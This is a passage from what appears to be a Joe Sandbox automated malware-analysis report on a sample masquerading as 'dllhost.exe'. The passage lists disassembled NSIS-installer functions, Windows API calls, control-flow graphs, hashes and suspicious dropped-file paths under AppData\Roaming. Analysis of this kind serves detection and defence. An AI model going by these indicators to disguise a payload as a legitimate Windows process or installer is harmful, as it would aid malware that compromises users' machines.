                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                                              • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                                              Function 0040658F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,7570D4C4,0040597A,?,C:\Users\user\AppData\Local\Temp\,7570D4C4), ref: 0040659A
                                                                              • FindClose.KERNEL32(00000000), ref: 004065A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: 8gB
                                                                              • API String ID: 2295610775-1733800166
                                                                              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                                              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                                              Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?), ref: 0040217D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet, xrefs: 004021BD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet
                                                                              • API String ID: 542301482-2207628267
                                                                              • Opcode ID: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                                                              • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                                                              • Opcode Fuzzy Hash: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                                                              • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                              Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                                                              • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                                              • Opcode Fuzzy Hash: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                                                              • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
                                                                              Function 00403D08 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 346windowstringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 195 403d2c-403d35 191->195 193 403eb9-403ece 192->193 194 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 192->194 199 403ed0-403ed3 193->199 200 403f0e-403f13 call 40422d 193->200 194->193 196 403d37-403d44 SetWindowPos 195->196 197 403d4a-403d4d 195->197 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 212 403f18-403f33 200->212 207 403d89-403d8c 201->207 208 403d6f-403d84 DestroyWindow 201->208 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 211 4041ae 205->211 218 403d8e-403d9a SetWindowLongW 207->218 219 403d9f-403da5 207->219 215 40418b-404191 208->215 217 4041b0-4041b7 211->217 213 403f35-403f37 call 40140b 212->213 214 403f3c-403f42 212->214 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->211 222 404193-404199 215->222 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->211 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                                                              • ShowWindow.USER32(?), ref: 00403D61
                                                                              • DestroyWindow.USER32 ref: 00403D75
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                                                              • GetDlgItem.USER32(?,?), ref: 00403DB2
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                                                              • EnableWindow.USER32(?,?), ref: 00403FE4
                                                                              • GetSystemMenu.USER32 ref: 00403FFA
                                                                              • EnableMenuItem.USER32 ref: 00404001
                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                                                              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                                                              • SetWindowTextW.USER32(?,004236E8,00000000,004236E8,?,004236E8,00000000), ref: 0040406A
                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID: ,UZ$6B
                                                                              • API String ID: 3282139019-3075455786
                                                                              • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                              • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                                                              • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                                                              • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                                                              Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 316 403a1a-403a42 call 40611a 314->316 316->313 322 403a44-403a48 316->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 353 403c03-403c05 349->353 356 403c07-403c0d 353->356 357 403c1f-403c21 call 40140b 353->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 366 403bf2-403bfb call 4038aa 361->366 362->338 366->332
                                                                              APIs
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,7570D4C4,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000), ref: 004039DB
                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                                                              • LoadImageW.USER32 ref: 00403AC2
                                                                                • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                                                              • CreateWindowExW.USER32 ref: 00403B4C
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                                                              • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                                                              • DialogBoxParamW.USER32 ref: 00403BE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                              • API String ID: 1975747703-3853068990
                                                                              • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                              • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                                                              • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                                                              • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                                                              Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 395 4030a0-4030a8 call 402e5d 387->395 396 402f7e-402f85 387->396 391 40304b-403063 call 4032f5 call 4032df 388->391 392 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->392 389->374 391->389 419 403065-40306b 391->419 392->389 417 4030aa-4030bb 392->417 395->389 401 403001-403005 396->401 402 402f87-402f9b call 405cf9 396->402 406 403007-40300e call 402e5d 401->406 407 40300f-403015 401->407 402->407 416 402f9d-402fa4 402->416 406->407 413 403024-40302e 407->413 414 403017-403021 call 406719 407->414 413->384 418 403034 413->418 414->413 416->407 422 402fa6-402fad 416->422 423 4030c3-4030c8 417->423 424 4030bd 417->424 418->381 419->389 419->392 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->407 435 402ffd-402fff 433->435 434->418 434->433 435->407
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000,004035F7,00000006,?,00000006,00000008,0000000A), ref: 00402ED2
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\dllhost.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\dllhost.exe,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\dllhost.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 4283519449-3159565494
                                                                              • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                                              • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                                              • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                                                              Function 0040626E Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 209stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 441 4062bb-4062c2 439->441 442 4064c6-4064d1 440->442 443 4062c7-4062d4 440->443 441->440 445 4064d3-4064d7 call 40624c 442->445 446 4064dc-4064dd 442->446 443->442 444 4062da-4062e6 443->444 447 4064a7 444->447 448 4062ec-40632a 444->448 445->446 450 4064b5-4064b8 447->450 451 4064a9-4064b3 447->451 452 406330-40633b 448->452 453 40644a-40644e 448->453 450->440 451->440 454 406354 452->454 455 40633d-406342 452->455 456 406450-406456 453->456 457 406481-406485 453->457 463 40635b-406362 454->463 455->454 460 406344-406347 455->460 461 406466-406472 call 40624c 456->461 462 406458-406464 call 406193 456->462 458 406494-4064a5 lstrlenW 457->458 459 406487-40648f call 40626e 457->459 458->440 459->458 460->454 465 406349-40634c 460->465 472 406477-40647d 461->472 462->472 468 406364-406366 463->468 469 406367-406369 463->469 465->454 470 40634e-406352 465->470 468->469 473 4063a4-4063a7 469->473 474 40636b-406389 call 40611a 469->474 470->463 472->458 478 40647f 472->478 476 4063b7-4063ba 473->476 477 4063a9-4063b5 GetSystemDirectoryW 473->477 480 40638e-406392 474->480 482 406425-406427 476->482 483 4063bc-4063ca GetWindowsDirectoryW 476->483 481 406429-40642d 477->481 479 406442-406448 call 4064e0 478->479 479->458 486 406432-406435 480->486 487 406398-40639f call 40626e 480->487 481->479 485 40642f 481->485 482->481 484 